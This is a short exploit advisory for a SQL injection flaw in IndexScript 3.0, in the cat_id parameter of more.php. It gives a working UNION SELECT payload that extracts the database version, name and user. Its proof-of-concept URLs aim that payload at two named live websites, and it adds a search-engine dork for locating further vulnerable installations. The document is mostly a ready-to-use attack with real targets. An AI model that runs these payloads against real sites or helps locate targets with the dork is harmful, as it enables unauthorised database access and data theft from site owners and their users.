[o] IndexScript 3.0 SQL Injection VulnerabilitySoftware : IndexScript version 3.0
Vendor : http://www.indexscript.com/
Download : http://www.indexscript.com/download.php
Author : NoGe
Home : http://antisecurity.org
[o] Vulnerable file
more.php
[o] Exploit
http://localhost/[path]/more.php?cat_id=[SQL]
[o] Proof of Concept
http://texxsmith.com/directory/more.php?cat_id=-3+union+select+1,2,3,4,5,version(),database(),user(),9--
http://www.internetkatalogen.net/more.php?cat_id=-77+union+select+1,2,3,4,5,version(),database(),user(),9--
[o] Dork
"powered by IndexScript"
Comments